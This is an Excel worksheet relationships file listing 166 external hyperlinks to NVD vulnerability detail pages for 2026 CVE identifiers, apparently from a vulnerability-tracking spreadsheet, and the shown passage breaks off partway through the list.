<file path=xl/worksheets/_rels/sheet8.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81963" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85880" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26084" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86464" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58240" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68839" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69463" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69525" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69829" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69845" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69910" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70296" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77493" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78445" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76969" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82067" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79571" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66768" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69854" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62706" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66814" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66818" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66819" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66820" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67368" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67370" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67373" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67380" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67381" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67384" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67385" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67388" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67631" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67638" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67639" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67642" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67643" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68775" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68786" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69266" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69268" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69273" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69282" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69461" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69464" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69465" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69518" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69669" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69716" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69724" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69860" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70203" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71336" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73006" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73016" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73028" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77480" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77481" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77482" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77483" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77484" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77486" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77487" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77495" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78456" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80083" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80096" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83992" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83996" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55250" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82064" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82075" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67378" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67379" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67636" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76958" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69479" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69638" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69846" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69906" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81354" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69510" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69620" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69813" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69858" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69989" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70342" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70563" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78444" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78450" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78626" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82066" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83997" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84393" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68834" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68838" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69332" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69412" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69423" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69503" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69505" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69727" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69773" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69826" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69847" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69875" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69876" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68787" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68832" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68841" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68875" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69265" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69270" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69293" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69295" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69298" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69307" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69312" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69323" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69352" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69421" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69475" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69476" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69489" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69532" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69571" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69580" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69583" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69584" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69589" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69593" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69687" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69707" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69709" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69738" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69787" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69822" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69841" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69844" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69900" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69907" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69921" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70289" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70564" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70569" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70572" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70581" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71334" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71337" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71343" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72941" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72988" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72990" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72991" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72992" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72993" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72994" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72995" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72996" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72997" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73000" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73001" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73002" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73007" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73011" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73015" TargetMode="External" Id="rId166" 